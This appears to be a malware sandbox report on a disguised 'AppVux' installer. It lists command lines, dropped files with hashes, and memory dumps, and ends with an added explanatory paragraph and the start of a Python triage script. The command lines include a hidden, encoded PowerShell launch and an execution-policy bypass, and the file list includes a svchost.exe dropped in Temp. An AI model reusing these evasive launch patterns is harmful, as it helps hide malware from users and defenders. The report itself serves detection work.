"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\Downloads\your_files\setup\setup.exe SETUPEXEDIR=C:\Users\Admin\Downloads\your_files\setup\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707400341 " AI_EUIMSI=""

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E70F789581D10F3FA049E68B56022B52

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrCB71.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe

"C:\Users\Admin\AppData\Roaming\vux epx\AppVux\gnupg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e 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

C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 1968

Network

Files

\??\pipe\crashpad_204_VWGSPUCVPNUGQLYZ

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\Downloads\your_files.zip.crdownload

MD5 c47971b7ded4a1ccc5d1614208913237
SHA1 d55e7ac02a336ca8d958b3081c0cf8bd1178daef
SHA256 834c369a06df3985f492150c0efb2be3cb06bb6a8e5d477e54eefd2943e4561a
SHA512 4ba3b3ab62df88bd72c66e24f87a7461d413a7ffeacb28d16831cc470b45c82853d8e330ece1af910c2b13c739d29d846684e6ca94af22f66b2b084d13cfe26c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3fb9f8702c7dffbb1af981449f085478
SHA1 2c401bf690c6d273b2cf823538fef1a7eb653473
SHA256 70b94cb2b20c0e076919c369e89578fc538fd772b6335ec04c0bd27772070017
SHA512 238149c46c2db3361320a85092ca67aac2bb2e9d3ff949b868cfe29d2bff53429346211d815afe7d97c4708e00cd1731cb5ce8dece1a9dfc8a92abd2a3e2b80e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e675f40922676892ee415e4e1f124585
SHA1 2db1f08b160cdc07b9ad6663b974a58bce2b1cce
SHA256 9a6b7b66c04b06acb53ed753c239d55bdbae80369f97ddad3b0de33a988fb2b1
SHA512 5679183124f345396a122924e8ae576b99832b58600cb260dc9b8d5be2a09d0c46afde0e9c6902263e7e79600bffdf401cfd0913eb46732bb7ede60be963a096

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 8bf247eb4dfaf194e8009ae13a1c6d1a
SHA1 1e773d7798f6e68b4f1f95adfc1c0cf277e0f303
SHA256 e703889a9b2728db8fa90dba23314c119dd6bf5e70c759236fd21eae960adb92
SHA512 726111586dff1ab81ea60dac42f4835a45247d817bd5d79888b8db5b68be6cd8b28daab2492f1c0a77bfe5f017b68e0b38b7d50b79c66e120f3f42eafa057aa4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe587903.TMP

MD5 1ac3d12ad0ff5da1810123ab795b5b81
SHA1 c905b7e56c1059782365816fc7c78d9a5f423752
SHA256 bd427e626c00660141aaf1bca497695e35bb078610d26a4e6237c5bfc170e6d8
SHA512 3f5ddae0c6a324aef956910ad90d46f924e9b2707ef6b754db3d2ebf2c220e5e4f63e05cefdf2cb32c0e80711ae7bdf40b504be6d66de63d624cd09932dc72a8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 8d67bf92c3f3cf2b4f07a6a61c4cb9da
SHA1 c2c11d713da7c579b597670b072cfe081e91d474
SHA256 8e42f6bb615da38391dc1a37d6b1e7f5969573cb8bb56f3259ad3adb8e90de38
SHA512 e382bca9b3e2077bb549f862c5339713e4763fb49a8208ebf2a7dcfdb6cd8671b4602d0ff461d58bac58c438513f348884d73d48bee8c55d62202104605677d6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\96f0f519-8520-4de5-a470-fbb300fa2a19.tmp

MD5 8b08c98694da2e25a6a17ed6f172d34e
SHA1 3cb6dfc2a4a6abd9f7b683a9a5de2dce8bbdd026
SHA256 a66575e39e190ed43bf9a1798b5b86343322a80311066c7f5b8c982cc2c49fc8
SHA512 04be1fbe8938494f9a4adbe5d4b54a738ddeede4ae460f958d1c76d446ff9778460bf503db74994455c9762d22614a07fe87cf9020dc8376a8700957f84969e7

memory/1764-333-0x0000012BA92A0000-0x0000012BA92B0000-memory.dmp

memory/1764-337-0x0000012BA9E40000-0x0000012BA9E50000-memory.dmp

memory/1764-344-0x0000012BB2090000-0x0000012BB2091000-memory.dmp

memory/1764-346-0x0000012BB2110000-0x0000012BB2111000-memory.dmp

memory/1764-348-0x0000012BB21A0000-0x0000012BB21A1000-memory.dmp

memory/1764-349-0x0000012BB21B0000-0x0000012BB21B1000-memory.dmp

memory/1764-350-0x0000012BB21B0000-0x0000012BB21B1000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json

MD5 d89f5fcc780e7611d62f2637556293c6
SHA1 991aebc8dbb16aec5b5382ab3bcdc85e8121909e
SHA256 ca7d14d9d69ca16f104fcefb712f278be6b8745b9d332de53ed69cfe20cef5c8
SHA512 68e4e517a988db5f44b1287c7fe5364bd2ec1060b729c80c8ede65ea311c3d8516869cef921d2f208c3b2a28485935303f681217909cb798767766149c55ac04

memory/1764-365-0x0000012BB21E0000-0x0000012BB21E1000-memory.dmp

memory/1764-364-0x0000012BB21F0000-0x0000012BB21F1000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json

MD5 404a3ec24e3ebf45be65e77f75990825
SHA1 1e05647cf0a74cedfdeabfa3e8ee33b919780a61
SHA256 cc45905af3aaa62601a69c748a06a2fa48eca3b28d44d8ec18764a7e8e4c3da2
SHA512 a55382b72267375821b0a229d3529ed54cef0f295f550d1e95661bafccec606aa1cd72e059d37d78e7d2927ae72e2919941251d233152f5eeb32ffdfc96023e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 2158855ae2e9d4068443e22ecbcac318
SHA1 edeb032f0d215743ef484da00ddf464cefbbf705
SHA256 a966a40000014508d6d611fe2df06162f74b2c2c2fe06d0698cdd8ac83e06b7c
SHA512 692678d2d4054f365f05cccdf7deb0109921fb012d3bfce4583b7d18a30e9d6aa088d2ef05de30e2720d1f70846973d9a1cebbe68dfd3c0ea6288d285fb33882

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi

MD5 ac4651a8b7ad1aa545649f41adcf55ec
SHA1 b3ad74fb2ba077f5680f5d836b64dba930e76795
SHA256 6fd723b2334f2046fa8c2f9b3b8e6a4ad61a50508ec7a575b0ed114bcf975072
SHA512 a7dc96d802b58501e956458b7718d5d9c3259a9c4b627323e0cb223ce8490e1e1a1d35e6d2baa2a2f24f0e895e1f8bf3aabc3e16cc73f0d17386018629bd6047

C:\Users\Admin\AppData\Local\Temp\MSIC5D4.tmp

MD5 5a1f2196056c0a06b79a77ae981c7761
SHA1 a880ae54395658f129e24732800e207ecd0b5603
SHA256 52f41817669af7ac55b1516894ee705245c3148f2997fa0e6617e9cc6353e41e
SHA512 9afc180ebc10c0ee0d7306f4b7085608a4e69321044d474691587bf7e63f945888781a9fc5e69568d351ac690b0335214bd04bdf5c75fd8a3bd1ec4be5d3475a

C:\Users\Admin\AppData\Local\Temp\MSIac749.LOG

MD5 623ac6152418a2b069885227ab5a2dc5
SHA1 ef7f50f03fb17b4121327d1ea985aed098b0d848
SHA256 cc47c1405b412dfeeaff023c37f90a5244a87dce3fd4bc7e950dec8157852a25
SHA512 6596c46ee9599c26fb55cf142c4cbb027ac2dcaa5a65525564ee42d2e9779a5e8f45766c34c5f86d27e11d8629fff011c3a24ccb7f143b100ddb1c796754c96e

C:\Windows\Installer\MSICB17.tmp

MD5 e92be2ea6cbab4b209fdb91999efa600
SHA1 3a78425b5d9094945ab20257900da3f05f146465
SHA256 d5249e4b26c8a396c8d3806e0fd8ba01806520fd546d815cc912e693463c699a
SHA512 215f81ac83f64eb3706444d4e018a1f25c09f6bb93432097f5262ee32484cfa1362fb43c91ff12be9611342b6151c09a5381a1dca51ae85beb49e4a9d5edee2c

memory/1964-499-0x0000000070EE0000-0x00000000715CE000-memory.dmp

memory/1964-500-0x00000000073D0000-0x00000000073E0000-memory.dmp

memory/1964-498-0x0000000007350000-0x0000000007386000-memory.dmp

memory/1964-501-0x00000000073D0000-0x00000000073E0000-memory.dmp

memory/1964-502-0x0000000007A10000-0x0000000008038000-memory.dmp

memory/1964-503-0x0000000008080000-0x00000000080A2000-memory.dmp

memory/1964-504-0x0000000008120000-0x0000000008186000-memory.dmp

memory/1964-505-0x0000000008290000-0x00000000082F6000-memory.dmp

memory/1964-506-0x0000000008520000-0x0000000008870000-memory.dmp

memory/1964-507-0x0000000008370000-0x000000000838C000-memory.dmp

memory/1964-508-0x00000000084B0000-0x00000000084FB000-memory.dmp

memory/1964-509-0x0000000008B60000-0x0000000008BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1p3ra444.j3i.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/1964-525-0x000000000A210000-0x000000000A888000-memory.dmp

memory/1964-526-0x0000000009950000-0x000000000996A000-memory.dmp

memory/1964-531-0x0000000009C50000-0x0000000009CE4000-memory.dmp

memory/1964-532-0x0000000009BF0000-0x0000000009C12000-memory.dmp

memory/1964-533-0x000000000A890000-0x000000000AD8E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1

MD5 864314b82d5abb9a763656b69b18d73a
SHA1 0a19fad1c6170c07815ef63dcea07a82481049c9
SHA256 118b6745b9dbeeb7997a6c55c1a9c49bcb5afffe88836df31f98b9b39929eb14
SHA512 0e55053f9d1dcbca9f39a07f929973bd9daac3ac9567b2d3778fc07e9241840f12c08dfcc27951472d6a02d1978e01e3ad68cd578f91370a8da45052af592f01

memory/1964-535-0x00000000073D0000-0x00000000073E0000-memory.dmp

memory/1964-540-0x000000000AF60000-0x000000000B122000-memory.dmp

memory/1964-541-0x000000000B660000-0x000000000BB8C000-memory.dmp

memory/1964-546-0x0000000070EE0000-0x00000000715CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt

MD5 6157c8432a9fd8ab05fd72c085b9c50d
SHA1 36d6aadfc543d39fd298a910165c8f9773c8dfcc
SHA256 b2e19fe898c0e44dc05738beed9ddd8d780126188e446cc6ca08c407509ab5e4
SHA512 f1edc77787966cc88d2b69505fa758e8f78bed2d9d6b65f34d0f49067ffea5b42a6b7612d6810b1727cdbb9fcbb42b459d3d2f9677561e7b4a07834e2d9fdb6f

C:\Windows\Installer\MSID74D.tmp

MD5 4a3f6a4023abd6bba56534de47d20017
SHA1 02dd888e467143e2e35465d73f39cf3e66afad10
SHA256 a8dfdc283ad8d4dc6f500ddfab564e79dadae075c0d54784b50e1ca548709b30
SHA512 580c7918ef90eb0020901bab645b72bcaf945ceb5bd56c2e7847f229b31a961bc4cd4ca9cb2583db480947ca8a0880b5ae4bd26717217abcacc9754352aaba28

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libgpg-error-0.dll

MD5 45d4164d940ee65b4eb2854fca94293f
SHA1 162b1adf5c261bd4481c6549e5f17fbb1cad96b6
SHA256 0a5a9cd5743be10c506036ad7e60d89d035d36dc5aa376d6a3b86cc009ce5094
SHA512 4b6b95f65e51c26f07b99d3cf47512a3e3404b21cc92ccd73fccf7e1cba3657c37950ac57b39d1aa1f9fc37727b4058a29a6e4a3b7fecba3dccd089b1da09dce

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libksba-8.dll

MD5 083f7e514d6b982f09f77e21af38b447
SHA1 69a69fe6328603f41429ddc67d1973f0f1b26c36
SHA256 7df2d8c02d76fdb0ea0d64261fd6a7cbfed0ca9c8f53c13de9da1731261392c0
SHA512 dff1d23470fa15a724040e883ee8a421d9193fccb29bbdd33090795e9d106bb388a22cfa2ffe83332ab535087ae8a2883f90b991e466a9ec49b2c67142675ff4

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libnpth-0.dll

MD5 a75aa079bab1f26fdf69b80f18e951c7
SHA1 1f64fc9d9e8500e0e015b3874d55e652d84df799
SHA256 8993c86367054b9f9e9ae517fd0025724d809832f8f6a9938a718cda23afb08c
SHA512 1834ca2e719baddafb6942d6ce7f45bdc14e95bb11fea968a052abaa03df5dc8d2703295fa15ba4c12f5ff14e842c805c1020f77618d6aba31b3127660b54300

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libsqlite3-0.dll

MD5 0db821923216fdd29f3ef752b67e0683
SHA1 4496a5ec7f08167faa3d2db4c225b962ece339c2
SHA256 70e479fbbc65ec754a0b6cc031f0e699468a6d4479c327a6f7c0a04cdca6a109
SHA512 15c35743c720b313daa65353b594967d90c8e67c69f5dfaf421e127afed0dcb42b09ce186d2359fd2579e9d835006ac3804742ba914062552f1a6e8b51a6dc05

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpg-check-pattern.exe

MD5 6ca7632cc5d6007fb6d29e1a8624664e
SHA1 50400a3fa8ee23a8f6b492fbc92c34e40bec8bbd
SHA256 124698ea407083fde0664ac4e950ea55f60d880f8ed636a05473a0e92e592dde
SHA512 62c8de1381115e2d7f787791ab53385b9c112696f2d7163b1c9e014eead13d9550f8f916d614f18ff791c23187ec987fd749e80fc4b376104ae6c1b6b0a0fc37

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-crt-conio-l1-1-0.dll

MD5 031dc390780ac08f498e82a5604ef1eb
SHA1 cf23d59674286d3dc7a3b10cd8689490f583f15f
SHA256 b119adad588ebca7f9c88628010d47d68bf6e7dc6050b7e4b787559f131f5ede
SHA512 1468ad9e313e184b5c88ffd79a17c7d458d5603722620b500dba06e5b831037cd1dd198c8ce2721c3260ab376582f5791958763910e77aa718449b6622d023c7

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-util-l1-1-0.dll

MD5 735636096b86b761da49ef26a1c7f779
SHA1 e51ffbddbf63dde1b216dccc753ad810e91abc58
SHA256 5eb724c51eecba9ac7b8a53861a1d029bf2e6c62251d00f61ac7e2a5f813aaa3
SHA512 3d5110f0e5244a58f426fbb72e17444d571141515611e65330ecfeabdcc57ad3a89a1a8b2dc573da6192212fb65c478d335a86678a883a1a1b68ff88ed624659

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-timezone-l1-1-0.dll

MD5 43e1ae2e432eb99aa4427bb68f8826bb
SHA1 eee1747b3ade5a9b985467512215caf7e0d4cb9b
SHA256 3d798b9c345a507e142e8dacd7fb6c17528cc1453abfef2ffa9710d2fa9e032c
SHA512 40ec0482f668bde71aeb4520a0709d3e84f093062bfbd05285e2cc09b19b7492cb96cdd6056281c213ab0560f87bd485ee4d2aeefa0b285d2d005634c1f3af0b

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 9d43b5e3c7c529425edf1183511c29e4
SHA1 07ce4b878c25b2d9d1c48c462f1623ae3821fcef
SHA256 19c78ef5ba470c5b295dddee9244cbd07d0368c5743b02a16d375bfb494d3328
SHA512 c8a1c581c3e465efbc3ff06f4636a749b99358ca899e362ea04b3706ead021c69ae9ea0efc1115eae6bbd9cf6723e22518e9bec21f27ddaafa3cf18b3a0034a7

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-synch-l1-2-0.dll

MD5 d175430eff058838cee2e334951f6c9c
SHA1 7f17fbdcef12042d215828c1d6675e483a4c62b1
SHA256 1c72ac404781a9986d8edeb0ee5dd39d2c27ce505683ca3324c0eccd6193610a
SHA512 6076086082e3e824309ba2c178e95570a34ece6f2339be500b8b0a51f0f316b39a4c8d70898c4d50f89f3f43d65c5ebbec3094a47d91677399802f327287d43b

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-synch-l1-1-0.dll

MD5 6c3fcd71a6a1a39eab3e5c2fd72172cd
SHA1 15b55097e54028d1466e46febca1dbb8dbefea4f
SHA256 a31a15bed26232a178ba7ecb8c8aa9487c3287bb7909952fc06ed0d2c795db26
SHA512 ef1c14965e5974754cc6a9b94a4fa5107e89966cb2e584ce71bbbdd2d9dc0c0536ccc9d488c06fa828d3627206e7d9cc8065c45c6fb0c9121962ccbecb063d4f

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-string-l1-1-0.dll

MD5 7a15b909b6b11a3be6458604b2ff6f5e
SHA1 0feb824d22b6beeb97bce58225688cb84ac809c7
SHA256 9447218cc4ab1a2c012629aaae8d1c8a428a99184b011bcc766792af5891e234
SHA512 d01dd566ff906aad2379a46516e6d060855558c3027ce3b991056244a8edd09ce29eacec5ee70ceea326ded7fc2683ae04c87f0e189eba0e1d38c06685b743c9

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\stylers.model.xml

MD5 343b8f55f376e88674733286d027f834
SHA1 466886054d5c2641ba6058f58a7a84053aa4696e
SHA256 f002b36e70f0fb159885c21fa6e6395176cd50a254201a94cbed756d9843fa9a
SHA512 ef6643badbb87739f0ae847d201651f8d3e677c54ca2aa3f81277b053355772f71d9b0f490617c104ce861a29e2b283fe6d82faf4cfe8f10bfc571d683cfea8e

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libintl-8.dll

MD5 16b4dba3e3bfdea7a528cc97721cbe60
SHA1 2a75d604f72ea1d1d929280b6b945b168a18f137
SHA256 b6939316ebc272b67fa90a8c599dceec0e22b93a7a9660c7b0db0ff1cc1308ae
SHA512 4d524e689a064a2a1d381033f05f635f0e5cb5863d0c1dd1cee4bf80303e0bf3db8d787ff52d348c6938bacea7ac695de10da747782696d18172951452a98ef9

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpg-wks-client.exe

MD5 ee38ab14557b765c80856531582f4f89
SHA1 660b872aaadd6658729f943f78bb45699e38f7c6
SHA256 4b0dfcc928a127b65928f6a941823b0e43c4cf08e2792e1e054a3886d51d8005
SHA512 4c4690c7af542ad5d67121259ec25dd67565273ea791f1a7e0536193f74115fb309054c44e336b19fee273dde71ab8543a2810a10dc2ba9eca5c7b286b46bcca

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpgtar.exe

MD5 a33215c3311b5819d6f12400b49333ab
SHA1 8d9338414b6e17cb9454b26b410abf7381e68eba
SHA256 45d80a39499a2dbfa3352169a7fb78492f7a253ca3ec6b0a6f61825b7c3a235d
SHA512 219fcc80b0362004ece4aeec22f93085166de6e8969b45c26f671412ff3b238c95e14f439a6efd8d06177fe790c781ddfd21e8a21a6100bfb8b08bd2e69d5973

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpgsm.exe

MD5 c1bb0e52c1e07b706804c5262207852a
SHA1 741d5972d06c09f7eb3c85dd573e302ff80d55e4
SHA256 e7d50bfc7ea031e4438b227e5f3c1c231aac831ccb709b08f6d4e3106d448b5e
SHA512 cd6d04bc70a77ee6299e2d7c0e832c1104fd16ffd0243e6bff36910850cccb17fca86a297369bb0cb7c19ef674adc2089aaac3fa173184ec1f93bbb123957295

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\dirmngr.exe

MD5 2e94c3258f7863b6bf4ea937aa12a144
SHA1 c5bf59d3b038f9bb9f7e05706e9e80f21ff3b022
SHA256 2cc38c48eb742a28a4562bc62c9dca7ef525a62164752135b45a4cff89064e6e
SHA512 0925f11504f6972ede8525d3f7050060034a785963772a8b0f8d38d9feba47c1f9f55dafc959eea1d1789d8a4fbe03639c3f44ae848aef971d1a51371ce1fe2b

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libassuan-0.dll

MD5 4f1849e84694314b868505c1dcc53747
SHA1 06b8274e2569b32b5f9cf36202952e70b2fb4b02
SHA256 f69073ed88c6e72ae3244ca310bb43892eb97a4ede9e20fa457e0d8fb72a3b24
SHA512 1956d6a9963b5eb712e7e61bccb3846677622838889b3de1820cc99f0b2aec81e3fba3456275f06be0b6a9ec573a502b38de7f0d32393447b385cad53c426d50

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gnupg.exe

MD5 e7a712a20275825b93d9b86464755870
SHA1 64bd04917a18d2faa75c46470461d550733aea61
SHA256 4e6f3f339ded64578816dfc3dc1d74ba198f7d698109c15ac658bb9891e2ea9e
SHA512 c1ef6aca74b674386521a54c435524cd1adfb70e5fb43fee48929ba1ff631f7e2cba2c773fc6976c72b7095c0e8c73e0766a3977f2cb8798560cbaada9cfcec3

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\zlib1.dll

MD5 f191ee2ae39bd67d4cc12c3667634d42
SHA1 e37aac8dc0da948eab6f24bbcd8495790cf99fd6
SHA256 df230f50a409db9ee949b9fdb10d7c08de03b5e3a0f72e7feb2618e436e1967a
SHA512 9e8d4eb00225cb646a8f5cbd8a36d9994150dd1b16029d9e9c0cdf5158f71642a761c887dcf680517a164770429f37f04412448351d9247f9cf2d2da6694c7ab

C:\Config.Msi\e5ac807.rbs

MD5 ca4adf13d5bc7c3af0d84bc58a1bbe36
SHA1 aa1c69eb5f9300f9c9ffb8441db359f577ad7ae0
SHA256 ca322b1fbe8346a514a9583c6c9fb93c7231565990ff51e55fede78d303bdf70
SHA512 7dff8de500fda6c5e27ffd4098bcd6d487048c9ab5d68fc0bf1111dd2cdc64a570d3b50d059207596dae45f42492ecef79b44963040611b52cf4e5170befed65

memory/1604-658-0x0000000000820000-0x0000000000845000-memory.dmp

memory/4288-659-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/1604-660-0x0000000000400000-0x000000000053E000-memory.dmp

memory/4288-661-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/1604-662-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/1604-665-0x0000000063080000-0x00000000630A9000-memory.dmp

memory/1604-667-0x0000000066580000-0x00000000666AA000-memory.dmp

memory/4288-664-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/1604-663-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/4288-666-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/1640-681-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp

memory/1640-682-0x000002349E200000-0x000002349E210000-memory.dmp

memory/1640-683-0x000002349E200000-0x000002349E210000-memory.dmp

memory/1640-684-0x000002349E210000-0x000002349E232000-memory.dmp

memory/1640-692-0x000002349E3C0000-0x000002349E436000-memory.dmp

memory/1640-710-0x000002349E200000-0x000002349E210000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe

MD5 a9c5924063a253f64fb86bc924be6996
SHA1 c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256 eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4
SHA512 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e

memory/1640-734-0x000002349E200000-0x000002349E210000-memory.dmp

memory/4288-743-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/4288-744-0x0000000000120000-0x0000000000220000-memory.dmp

memory/4288-745-0x00000000054B0000-0x0000000005538000-memory.dmp

memory/4288-746-0x0000000006610000-0x0000000006A10000-memory.dmp

memory/4288-748-0x0000000006610000-0x0000000006A10000-memory.dmp

memory/4288-749-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp

memory/4288-750-0x0000000006610000-0x0000000006A10000-memory.dmp

memory/4288-752-0x00000000744F0000-0x00000000746B2000-memory.dmp

memory/3040-753-0x0000000002780000-0x0000000002789000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kyV4XPwc2QRqDcs..dat

MD5 f0f942c7faac4695ff0e7002a21a12a6
SHA1 f9f1c24d6494aabe71b1d18da68cb2fbf77d4add
SHA256 eb203f4ad6ae7bab5e9608b3fd3e1d2e014393b9131dd46bb09640a299ef1006
SHA512 5b18e7f41e00f622aad2b176011cf5498f7f7fdd4a5c93f95b3502bb060c9a3d62548640d93e3d8a9043bcb63aa68e420b5c468480d0894baff1802e460a9ac7

memory/3040-757-0x00000000044E0000-0x00000000048E0000-memory.dmp

memory/3040-759-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp

memory/3040-761-0x00000000044E0000-0x00000000048E0000-memory.dmp

memory/1640-758-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp

memory/3040-763-0x00000000744F0000-0x00000000746B2000-memory.dmp

memory/1640-764-0x000002349E200000-0x000002349E210000-memory.dmp

memory/3040-762-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp

memory/3040-765-0x00000000044E0000-0x00000000048E0000-memory.dmp

memory/3040-766-0x00000000044E0000-0x00000000048E0000-memory.dmp

memory/4288-771-0x00000000054B0000-0x0000000005538000-memory.dmp

memory/4288-772-0x0000000006610000-0x0000000006A10000-memory.dmp

memory/1640-773-0x000002349E200000-0x000002349E210000-memory.dmp

memory/1640-783-0x000002349E200000-0x000002349E210000-memory.dmp
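The file listing above mixes three kinds of entries: sandbox and application housekeeping (Chrome profile writes, msiexec scratch files, the PowerShell script-policy probe), the GnuPG-style bundle unpacked under AppData\Roaming, and the artifacts that actually matter for hunting (a svchost.exe written to a random Temp directory, a .dat next to it). The Python below is an added example, not part of this report and not the sandbox vendor's tooling: it parses the plain-text layout the report uses (a drive-letter path line, a blank line, then MD5/SHA1/SHA256/SHA512 lines, with memory/<pid>-<n>-<start>-<end>-memory.dmp lines interleaved) and sorts each file into noise versus artifacts worth a second look. The labels and the path rules are this example's own heuristics, not verdicts from the report. One check it performs is a fact, not an assumption: PowerShell's __PSScriptPolicyTest_*.ps1 probe file contains exactly the byte "1", so the listed MD5/SHA1/SHA256 for that file should equal the digests of b"1"; if they do not, something else wrote a file with that name. The sample input is constructed from entries copied verbatim from the listing above, with SHA512 lines left out for brevity.

```python
"""Triage helper for a sandbox 'Files' listing in the layout used above.
Added example, not part of the report or the sandbox vendor's tooling; the labels
are this example's own heuristics, not verdicts taken from the report."""
import hashlib
import re

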